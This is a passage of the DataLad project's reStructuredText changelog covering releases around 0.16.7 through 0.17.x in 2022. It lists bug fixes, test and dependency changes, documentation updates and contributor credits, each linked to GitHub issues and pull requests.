_documentation-8:\n\nDocumentation\n-------------\n\n- Fix documentation of ``Runner.run()`` to not accept strings. Instead,\n encoding must be ensured by the caller. Fixes\n `#7145 <https://github.com/datalad/datalad/issues/7145>`__ via `PR\n #7155 <https://github.com/datalad/datalad/pull/7155>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _internal-7:\n\nInternal\n--------\n\n- Fix import of the ``ls`` command from datalad-deprecated for\n benchmarks. Fixes\n `#7149 <https://github.com/datalad/datalad/issues/7149>`__ via `PR\n #7154 <https://github.com/datalad/datalad/pull/7154>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Unify definition of parameter choices with ``datalad clean``. Fixes\n `#7026 <https://github.com/datalad/datalad/issues/7026>`__ via `PR\n #7161 <https://github.com/datalad/datalad/pull/7161>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _tests-8:\n\nTests\n-----\n\n- Fix test failure with old annex. Fixes\n `#7157 <https://github.com/datalad/datalad/issues/7157>`__ via `PR\n #7159 <https://github.com/datalad/datalad/pull/7159>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n- Re-enable now passing test_path_diff test on Windows. Fixes\n `#3725 <https://github.com/datalad/datalad/issues/3725>`__ via `PR\n #7194 <https://github.com/datalad/datalad/pull/7194>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Use Plaintext keyring backend in tests to avoid the need for\n (interactive) authentication to unlock the keyring during (CI-) test\n runs. Fixes\n `#6623 <https://github.com/datalad/datalad/issues/6623>`__ via `PR\n #7209 <https://github.com/datalad/datalad/pull/7209>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _section-11:\n\n0.17.9 (2022-11-07)\n===================\n\n.. _bug-fixes-10:\n\nBug Fixes\n---------\n\n- Various small fixups ran after looking post-release and trying to\n build Debian package. `PR\n #7112 <https://github.com/datalad/datalad/pull/7112>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- BF: Fix add-archive-contents try-finally statement by defining\n variable earlier. `PR\n #7117 <https://github.com/datalad/datalad/pull/7117>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- Fix RIA file URL reporting in exception handling. `PR\n #7123 <https://github.com/datalad/datalad/pull/7123>`__ (by\n `@adswa <https://github.com/adswa>`__)\n\n- HTTP download treated ‘429 - too many requests’ as an authentication\n issue and was consequently trying to obtain credentials. Fixes\n `#7129 <https://github.com/datalad/datalad/issues/7129>`__ via `PR\n #7129 <https://github.com/datalad/datalad/pull/7129>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _dependencies-2:\n\nDependencies\n------------\n\n- Unrestrict pytest and pytest-cov versions. `PR\n #7125 <https://github.com/datalad/datalad/pull/7125>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Remove remaining references to ``nose`` and the implied requirement\n for building the documentation Fixes\n `#7100 <https://github.com/datalad/datalad/issues/7100>`__ via `PR\n #7136 <https://github.com/datalad/datalad/pull/7136>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _internal-8:\n\nInternal\n--------\n\n- Use datalad/release-action. Fixes\n `#7110 <https://github.com/datalad/datalad/issues/7110>`__. 
`PR\n #7111 <https://github.com/datalad/datalad/pull/7111>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Fix all logging to use %-interpolation and not .format, sort imports\n in touched files, add pylint-ing for % formatting in log messages to\n ``tox -e lint``. `PR\n #7118 <https://github.com/datalad/datalad/pull/7118>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _tests-9:\n\nTests\n-----\n\n- Increase the upper time limit after which we assume that a process is\n stalling. That should reduce false positives from\n ``datalad.support.tests.test_parallel.py::test_stalling``, without\n impacting the runtime of passing tests. `PR\n #7119 <https://github.com/datalad/datalad/pull/7119>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- XFAIL a check on length of results in test_gracefull_death. `PR\n #7126 <https://github.com/datalad/datalad/pull/7126>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Configure Git to allow for “file” protocol in tests. `PR\n #7130 <https://github.com/datalad/datalad/pull/7130>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _section-12:\n\n0.17.8 (2022-10-24)\n===================\n\n.. _bug-fixes-11:\n\nBug Fixes\n---------\n\n- Prevent adding duplicate entries to .gitmodules. `PR\n #7088 <https://github.com/datalad/datalad/pull/7088>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- [BF] Prevent double yielding of impossible get result Fixes\n `#5537 <https://github.com/datalad/datalad/issues/5537>`__. `PR\n #7093 <https://github.com/datalad/datalad/pull/7093>`__ (by\n `@jsheunis <https://github.com/jsheunis>`__)\n\n- Stop rendering the output of internal ``subdatset()`` call in the\n results of ``run_procedure()``. Fixes\n `#7091 <https://github.com/datalad/datalad/issues/7091>`__ via `PR\n #7094 <https://github.com/datalad/datalad/pull/7094>`__ (by\n `@mslw <https://github.com/mslw>`__ & `@mih <https://github.com/mih>`__)\n\n- Improve handling of ``--existing reconfigure`` in\n ``create-sibling-ria``: previously, the command would not make the\n underlying ``git init`` call for existing local repositories, leading\n to some configuration updates not being applied. Partially addresses\n https://github.com/datalad/datalad/issues/6967 via\n https://github.com/datalad/datalad/pull/7095 (by @mslw)\n\n- Ensure subprocess environments have a valid path in\n ``os.environ['PWD']``, even if a Path-like object was given to the\n runner on subprocess creation or invocation. Fixes\n `#7040 <https://github.com/datalad/datalad/issues/7040>`__ via `PR\n #7107 <https://github.com/datalad/datalad/pull/7107>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Improved reporting when using ``dry-run`` with github-like\n ``create-sibling*`` commands (``-gin``, ``-gitea``, ``-github``,\n ``-gogs``). The result messages will now display names of the\n repositories which would be created (useful for recursive\n operations). `PR\n #7103 <https://github.com/datalad/datalad/pull/7103>`__ (by\n `@mslw <https://github.com/mslw>`__)\n\n.. _section-13:\n\n0.17.7 (2022-10-14)\n===================\n\n.. _bug-fixes-12:\n\nBug Fixes\n---------\n\n- Let ``EnsureChoice`` report the value is failed validating. `PR\n #7067 <https://github.com/datalad/datalad/pull/7067>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- Avoid writing to stdout/stderr from within datalad sshrun. This could\n lead to broken pipe errors when cloning via SSH and was superfluous\n to begin with. 
Fixes https://github.com/datalad/datalad/issues/6599\n via https://github.com/datalad/datalad/pull/7072 (by @bpoldrack)\n\n- BF: lock across threads check/instantiation of Flyweight instances.\n Fixes `#6598 <https://github.com/datalad/datalad/issues/6598>`__ via\n `PR #7075 <https://github.com/datalad/datalad/pull/7075>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-9:\n\nInternal\n--------\n\n- Do not use ``gen4``-metadata methods in ``datalad metadata``-command.\n `PR #7001 <https://github.com/datalad/datalad/pull/7001>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- Revert “Remove chardet version upper limit” (introduced in\n 0.17.6~11^2) to bring back upper limit <= 5.0.0 on chardet. Otherwise\n we can get some deprecation warnings from requests `PR\n #7057 <https://github.com/datalad/datalad/pull/7057>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Ensure that ``BatchedCommandError`` is raised if the subprocesses of\n ``BatchedCommand`` fails or raises a ``CommandError``. `PR\n #7068 <https://github.com/datalad/datalad/pull/7068>`__ (by\n `@christian-monch <https://github.com/christian-monch>`__)\n\n- RF: remove unused code str-ing PurePath. `PR\n #7073 <https://github.com/datalad/datalad/pull/7073>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Update GitHub Actions action versions. `PR\n #7082 <https://github.com/datalad/datalad/pull/7082>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. _tests-10:\n\nTests\n-----\n\n- Fix broken test helpers for result record testing that would falsely\n pass. `PR #7002 <https://github.com/datalad/datalad/pull/7002>`__ (by\n `@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _section-14:\n\n0.17.6 (2022-09-21)\n===================\n\n.. _bug-fixes-13:\n\nBug Fixes\n---------\n\n- UX: push - provide specific error with details if push failed due to\n permission issue. `PR\n #7011 <https://github.com/datalad/datalad/pull/7011>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Fix datalad –help to not have *Global options* empty with python 3.10\n and list options in “options:” section. `PR\n #7028 <https://github.com/datalad/datalad/pull/7028>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n- Let ``create`` touch the dataset root, if not saving in parent\n dataset. `PR #7036 <https://github.com/datalad/datalad/pull/7036>`__\n (by `@mih <https://github.com/mih>`__)\n\n- Let ``get_status_dict()`` use exception message if none is passed.\n `PR #7037 <https://github.com/datalad/datalad/pull/7037>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- Make choices for ``status|diff --annex`` and\n ``status|diff --untracked`` visible. `PR\n #7039 <https://github.com/datalad/datalad/pull/7039>`__ (by\n `@mih <https://github.com/mih>`__)\n\n- push: Assume 0 bytes pushed if git-annex does not provide bytesize.\n `PR #7049 <https://github.com/datalad/datalad/pull/7049>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _internal-10:\n\nInternal\n--------\n\n- Use scriv for CHANGELOG generation in release workflow. `PR\n #7009 <https://github.com/datalad/datalad/pull/7009>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n- Stop using auto. `PR\n #7024 <https://github.com/datalad/datalad/pull/7024>`__ (by\n `@jwodder <https://github.com/jwodder>`__)\n\n.. 
_tests-11:\n\nTests\n-----\n\n- Allow for any 2 from first 3 to be consumed in test_gracefull_death.\n `PR #7041 <https://github.com/datalad/datalad/pull/7041>`__ (by\n `@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.5 (Fri Sep 02 2022)\n========================\n\nBug Fix\n-------\n\n- BF: blacklist 23.9.0 of keyring as introduces regression\n `#7003 <https://github.com/datalad/datalad/pull/7003>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Make the manpages build reproducible via datalad.source.epoch (to be\n used in Debian packaging)\n `#6997 <https://github.com/datalad/datalad/pull/6997>`__\n (`@lamby <https://github.com/lamby>`__ [email protected]\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: backquote path/drive in Changelog\n `#6997 <https://github.com/datalad/datalad/pull/6997>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\nAuthors: 3\n----------\n\n- Chris Lamb (`@lamby <https://github.com/lamby>`__)\n- DataLad Bot ([email protected])\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.4 (Tue Aug 30 2022)\n========================\n\n.. _bug-fix-1:\n\nBug Fix\n-------\n\n- BF: make logic more consistent for files=[] argument (which is False\n but not None)\n `#6976 <https://github.com/datalad/datalad/pull/6976>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Run pytests in parallel (-n 2) on appveyor\n `#6987 <https://github.com/datalad/datalad/pull/6987>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Add workflow for autogenerating changelog snippets\n `#6981 <https://github.com/datalad/datalad/pull/6981>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Provide ``/dev/null`` (``b:\\nul`` on Windows) instead of empty string\n as a git-repo to avoid reading local repo configuration\n `#6986 <https://github.com/datalad/datalad/pull/6986>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF: call_from_parser - move code into “else” to simplify reading etc\n `#6982 <https://github.com/datalad/datalad/pull/6982>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: if early attempt to parse resulted in error, setup subparsers\n `#6980 <https://github.com/datalad/datalad/pull/6980>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Run pytests in parallel (-n 2) on Travis\n `#6915 <https://github.com/datalad/datalad/pull/6915>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Send one character (no newline) to stdout in protocol test to\n guarantee a single “message” and thus a single custom value\n `#6978 <https://github.com/datalad/datalad/pull/6978>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n\n.. _tests-12:\n\nTests\n-----\n\n- TST: test_stalling – wait x10 not just x5 time\n `#6995 <https://github.com/datalad/datalad/pull/6995>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-3-1:\n\nAuthors: 3\n----------\n\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.3 (Tue Aug 23 2022)\n========================\n\n.. 
_bug-fix-2:\n\nBug Fix\n-------\n\n- BF: git_ignore_check do not overload possible value of stdout/err if\n present `#6937 <https://github.com/datalad/datalad/pull/6937>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOCfix: fix docstring GeneratorStdOutErrCapture to say that treats\n both stdout and stderr identically\n `#6930 <https://github.com/datalad/datalad/pull/6930>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Explain purpose of create-sibling-ria’s –post-update-hook\n `#6958 <https://github.com/datalad/datalad/pull/6958>`__\n (`@mih <https://github.com/mih>`__)\n- ENH+BF: get_parent_paths - make / into sep option and consistently\n use “/” as path separator\n `#6963 <https://github.com/datalad/datalad/pull/6963>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TEMP): use git-annex from neurodebian -devel to gain fix for bug\n detected with datalad-crawler\n `#6965 <https://github.com/datalad/datalad/pull/6965>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): make tests use *path* helper for Windows “friendliness” of\n the tests `#6955 <https://github.com/datalad/datalad/pull/6955>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): prevent auto-upgrade of “remote” test sibling, do not use\n local path for URL\n `#6957 <https://github.com/datalad/datalad/pull/6957>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Forbid drop operation from symlink’ed annex (e.g. due to being cloned\n with –reckless=ephemeral) to prevent data-loss\n `#6959 <https://github.com/datalad/datalad/pull/6959>`__\n (`@mih <https://github.com/mih>`__)\n- Acknowledge git-config comment chars\n `#6944 <https://github.com/datalad/datalad/pull/6944>`__\n (`@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Minor tuneups to please updated codespell\n `#6956 <https://github.com/datalad/datalad/pull/6956>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- TST: Add a testcase for #6950\n `#6957 <https://github.com/datalad/datalad/pull/6957>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF+ENH(TST): fix typo in code of wtf filesystems reports\n `#6920 <https://github.com/datalad/datalad/pull/6920>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: Datalad -> DataLad\n `#6937 <https://github.com/datalad/datalad/pull/6937>`__\n (`@aqw <https://github.com/aqw>`__)\n- BF: fix typo which prevented silently to not show details of\n filesystems `#6930 <https://github.com/datalad/datalad/pull/6930>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): allow for a annex repo version to upgrade if running in\n adjusted branches\n `#6927 <https://github.com/datalad/datalad/pull/6927>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF extensions github action to centralize configuration for\n extensions etc, use pytest for crawler\n `#6914 <https://github.com/datalad/datalad/pull/6914>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: travis - mark our directory as safe to interact with as root\n `#6919 <https://github.com/datalad/datalad/pull/6919>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: do not pretend we know what repo version git-annex would upgrade\n to `#6902 <https://github.com/datalad/datalad/pull/6902>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(TST): do not expect log message for guessing Path to be possibly a\n URL on windows\n `#6911 <https://github.com/datalad/datalad/pull/6911>`__\n (`@yarikoptic 
<https://github.com/yarikoptic>`__)\n- ENH(TST): Disable coverage reporting on travis while running pytest\n `#6898 <https://github.com/datalad/datalad/pull/6898>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF: just rename internal variable from unclear “op” to “io”\n `#6907 <https://github.com/datalad/datalad/pull/6907>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DX: Demote loglevel of message on url parameters to DEBUG while\n guessing RI `#6891 <https://github.com/datalad/datalad/pull/6891>`__\n (`@adswa <https://github.com/adswa>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Fix and expand datalad.runner type annotations\n `#6893 <https://github.com/datalad/datalad/pull/6893>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Use pytest to test datalad-metalad in test_extensions-workflow\n `#6892 <https://github.com/datalad/datalad/pull/6892>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Let push honor multiple publication dependencies declared via\n siblings `#6869 <https://github.com/datalad/datalad/pull/6869>`__\n (`@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: upgrade versioneer from versioneer-0.20.dev0 to\n versioneer-0.23.dev0\n `#6888 <https://github.com/datalad/datalad/pull/6888>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH: introduce typing checking and GitHub workflow\n `#6885 <https://github.com/datalad/datalad/pull/6885>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RF,ENH(TST): future proof testing of git annex version upgrade + test\n annex init on all supported versions\n `#6880 <https://github.com/datalad/datalad/pull/6880>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- ENH(TST): test against supported git annex repo version 10 + make it\n a full sweep over tests\n `#6881 <https://github.com/datalad/datalad/pull/6881>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: RF f-string uses in logger to %-interpolations\n `#6886 <https://github.com/datalad/datalad/pull/6886>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Merge branch ‘bf-sphinx-5.1.0’ into maint\n `#6883 <https://github.com/datalad/datalad/pull/6883>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF(DOC): workaround for #10701 of sphinx in 5.1.0\n `#6883 <https://github.com/datalad/datalad/pull/6883>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Clarify confusing INFO log message from get() on dataset installation\n `#6871 <https://github.com/datalad/datalad/pull/6871>`__\n (`@mih <https://github.com/mih>`__)\n- Protect again failing to load a command interface from an extension\n `#6879 <https://github.com/datalad/datalad/pull/6879>`__\n (`@mih <https://github.com/mih>`__)\n- Support unsetting config via ``datalad -c :<name>``\n `#6864 <https://github.com/datalad/datalad/pull/6864>`__\n (`@mih <https://github.com/mih>`__)\n- Fix DOC string typo in the path within AnnexRepo.annexstatus, and\n replace with proper sphinx reference\n `#6858 <https://github.com/datalad/datalad/pull/6858>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Improved support for saving typechanges\n `#6793 <https://github.com/datalad/datalad/pull/6793>`__\n (`@mih <https://github.com/mih>`__)\n\nPushed to ``maint``\n-------------------\n\n- BF: Remove duplicate ds key from result record\n (`@adswa <https://github.com/adswa>`__)\n- DOC: fix capitalization of 
service names\n (`@aqw <https://github.com/aqw>`__)\n\n.. _tests-13:\n\nTests\n-----\n\n- BF(TST,workaround): just xfail failing archives test on NFS\n `#6912 <https://github.com/datalad/datalad/pull/6912>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\nAuthors: 5\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Alex Waite (`@aqw <https://github.com/aqw>`__)\n- Christian Mönch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.2 (Sat Jul 16 2022)\n========================\n\n.. _bug-fix-3:\n\nBug Fix\n-------\n\n- BF(TST): do proceed to proper test for error being caught for recent\n git-annex on windows with symlinks\n `#6850 <https://github.com/datalad/datalad/pull/6850>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Addressing problem testing against python 3.10 on Travis (skip more\n annex versions)\n `#6842 <https://github.com/datalad/datalad/pull/6842>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- XFAIL test_runner_parametrized_protocol on python3.8 when getting\n duplicate output\n `#6837 <https://github.com/datalad/datalad/pull/6837>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: Make create’s check for procedures work with several again\n `#6841 <https://github.com/datalad/datalad/pull/6841>`__\n (`@adswa <https://github.com/adswa>`__)\n- Support older pytests\n `#6836 <https://github.com/datalad/datalad/pull/6836>`__\n (`@jwodder <https://github.com/jwodder>`__)\n\n.. _authors-3-2:\n\nAuthors: 3\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.1 (Mon Jul 11 2022)\n========================\n\n.. 
_bug-fix-4:\n\nBug Fix\n-------\n\n- DOC: minor fix - consistent DataLad (not Datalad) in docs and\n CHANGELOG `#6830 <https://github.com/datalad/datalad/pull/6830>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: fixup/harmonize Changelog for 0.17.0 a little\n `#6828 <https://github.com/datalad/datalad/pull/6828>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- BF: use –python-match minor option in new datalad-installer release\n to match outside version of Python\n `#6827 <https://github.com/datalad/datalad/pull/6827>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Do not quote paths for ssh >= 9\n `#6826 <https://github.com/datalad/datalad/pull/6826>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Suppress DeprecationWarning to allow for distutils to be used\n `#6819 <https://github.com/datalad/datalad/pull/6819>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- RM(TST): remove testing of datalad.test which was removed from 0.17.0\n `#6822 <https://github.com/datalad/datalad/pull/6822>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Avoid import of nose-based tests.utils, make skip_if_no_module() and\n skip_if_no_network() allowed at module level\n `#6817 <https://github.com/datalad/datalad/pull/6817>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- BF(TST): use higher level asyncio.run instead of\n asyncio.get_event_loop in test_inside_async\n `#6808 <https://github.com/datalad/datalad/pull/6808>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-3-3:\n\nAuthors: 3\n----------\n\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- John T. Wodder II (`@jwodder <https://github.com/jwodder>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.17.0 (Thu Jul 7 2022) – pytest migration\n==========================================\n\n.. _enhancements-and-new-features-3:\n\nEnhancements and new features\n-----------------------------\n\n- “log” progress bar now reports about starting a specific action as\n well. `#6756 <https://github.com/datalad/datalad/pull/6756>`__ (by\n @yarikoptic)\n- Documentation and behavior of traceback reporting for log messages\n via ``DATALAD_LOG_TRACEBACK`` was improved to yield a more compact\n report. The documentation for this feature has been clarified.\n `#6746 <https://github.com/datalad/datalad/pull/6746>`__ (by @mih)\n- ``datalad unlock`` gained a progress bar.\n `#6704 <https://github.com/datalad/datalad/pull/6704>`__ (by @adswa)\n- When ``create-sibling-gitlab`` is called on non-existing subdatasets\n or paths it now returns an impossible result instead of no feedback\n at all. `#6701 <https://github.com/datalad/datalad/pull/6701>`__ (by\n @adswa)\n- ``datalad wtf`` includes a report on file system types of commonly\n used paths. 
`#6664 <https://github.com/datalad/datalad/pull/6664>`__\n (by @adswa)\n- Use next generation metadata code in search, if it is available.\n `#6518 <https://github.com/datalad/datalad/pull/6518>`__ (by\n @christian-monch)\n\nDeprecations and removals\n-------------------------\n\n- Remove unused and untested log helpers ``NoProgressLog`` and\n ``OnlyProgressLog``.\n `#6747 <https://github.com/datalad/datalad/pull/6747>`__ (by @mih)\n- Remove unused ``sorted_files()`` helper.\n `#6722 <https://github.com/datalad/datalad/pull/6722>`__ (by @adswa)\n- Discontinued the value ``stdout`` for use with the config variable\n ``datalad.log.target`` as its use would inevitably break special\n remote implementations.\n `#6675 <https://github.com/datalad/datalad/pull/6675>`__ (by\n @bpoldrack)\n- ``AnnexRepo.add_urls()`` is deprecated in favor of\n ``AnnexRepo.add_url_to_file()`` or a direct call to\n ``AnnexRepo.call_annex()``.\n `#6667 <https://github.com/datalad/datalad/pull/6667>`__ (by @mih)\n- ``datalad test`` command and supporting functionality (e.g.,\n ``datalad.test``) were removed.\n `#6273 <https://github.com/datalad/datalad/pull/6273>`__ (by\n @jwodder)\n\n.. _bug-fixes-14:\n\nBug Fixes\n---------\n\n- ``export-archive`` does not rely on ``normalize_path()`` methods\n anymore and became more robust when called from subdirectories.\n `#6745 <https://github.com/datalad/datalad/pull/6745>`__ (by @adswa)\n- Sanitize keys before checking content availability to ensure that the\n content availability of files with URL- or custom backend keys is\n correctly determined and marked.\n `#6663 <https://github.com/datalad/datalad/pull/6663>`__ (by @adswa)\n- Ensure saving a new subdataset to a superdataset yields a valid\n ``.gitmodules`` record regardless of whether and how a path\n constraint is given to the ``save()`` call. Fixes #6547\n `#6790 <https://github.com/datalad/datalad/pull/6790>`__ (by @mih)\n- ``save`` now repairs annex symlinks broken by a ``git-mv`` operation\n prior recording a new dataset state. Fixes #4967\n `#6795 <https://github.com/datalad/datalad/pull/6795>`__ (by @mih)\n\n.. _documentation-9:\n\nDocumentation\n-------------\n\n- API documentation for log helpers, like ``log_progress()`` is now\n included in the renderer documentation.\n `#6746 <https://github.com/datalad/datalad/pull/6746>`__ (by @mih)\n- New design document on progress reporting.\n `#6734 <https://github.com/datalad/datalad/pull/6734>`__ (by @mih)\n- Explain downstream consequences of using ``--fast`` option in\n ``addurls``. `#6684 <https://github.com/datalad/datalad/pull/6684>`__\n (by @jdkent)\n\n.. 
_internal-11:\n\nInternal\n--------\n\n- Inline code of ``create-sibling-ria`` has been refactored to an\n internal helper to check for siblings with particular names across\n dataset hierarchies in ``datalad-next``, and is reintroduced into\n core to modularize the code base further.\n `#6706 <https://github.com/datalad/datalad/pull/6706>`__ (by @adswa)\n- ``get_initialized_logger`` now lets a given ``logtarget`` take\n precedence over ``datalad.log.target``.\n `#6675 <https://github.com/datalad/datalad/pull/6675>`__ (by\n @bpoldrack)\n- Many uses of deprecated call options were replaced with the\n recommended ones.\n `#6273 <https://github.com/datalad/datalad/pull/6273>`__ (by\n @jwodder)\n- Get rid of ``asyncio`` import by defining few noops methods from\n ``asyncio.protocols.SubprocessProtocol`` directly in\n ``WitlessProtocol``.\n `#6648 <https://github.com/datalad/datalad/pull/6648>`__ (by\n @yarikoptic)\n- Consolidate ``GitRepo.remove()`` and ``AnnexRepo.remove()`` into a\n single implementation.\n `#6783 <https://github.com/datalad/datalad/pull/6783>`__ (by @mih) ##\n Tests\n- Discontinue use of ``with_testrepos`` decorator other than for the\n deprecation cycle for ``nose``.\n `#6690 <https://github.com/datalad/datalad/pull/6690>`__ (by @mih\n @bpoldrack) See\n `#6144 <https://github.com/datalad/datalad/issues/6144>`__ for full\n list of changes.\n- Remove usage of deprecated ``AnnexRepo.add_urls`` in tests.\n `#6683 <https://github.com/datalad/datalad/pull/6683>`__ (by\n @bpoldrack)\n- Minimalistic (adapters, no assert changes, etc) migration from\n ``nose`` to ``pytest``. Support functionality possibly used by\n extensions and relying on ``nose`` helpers is left in place to avoid\n affecting their run time and defer migration of their test setups..\n `#6273 <https://github.com/datalad/datalad/pull/6273>`__ (by\n @jwodder)\n\nAuthors: 7\n----------\n\n- Yaroslav Halchenko (@yarikoptic)\n- Michael Hanke (@mih)\n- Benjamin Poldrack (@bpoldrack)\n- Adina Wagner (@adswa)\n- John T. Wodder (@jwodder)\n- Christian Mnch (@christian-monch)\n- James Kent (@jdkent)\n\n0.16.7 (Wed Jul 06 2022)\n========================\n\n.. 
_bug-fix-5:\n\nBug Fix\n-------\n\n- Fix broken annex symlink after git-mv before saving + fix a race\n condition in ssh copy test\n `#6809 <https://github.com/datalad/datalad/pull/6809>`__\n (`@christian-monch <https://github.com/christian-monch>`__\n `@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Do not ignore already known status info on submodules\n `#6790 <https://github.com/datalad/datalad/pull/6790>`__\n (`@mih <https://github.com/mih>`__)\n- Fix “common data source” test to use a valid URL (maint-based &\n extended edition)\n `#6788 <https://github.com/datalad/datalad/pull/6788>`__\n (`@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Upload coverage from extension tests to Codecov\n `#6781 <https://github.com/datalad/datalad/pull/6781>`__\n (`@jwodder <https://github.com/jwodder>`__)\n- Clean up line end handling in GitRepo\n `#6768 <https://github.com/datalad/datalad/pull/6768>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Do not skip file-URL tests on windows\n `#6772 <https://github.com/datalad/datalad/pull/6772>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Fix test errors caused by updated chardet v5 release\n `#6777 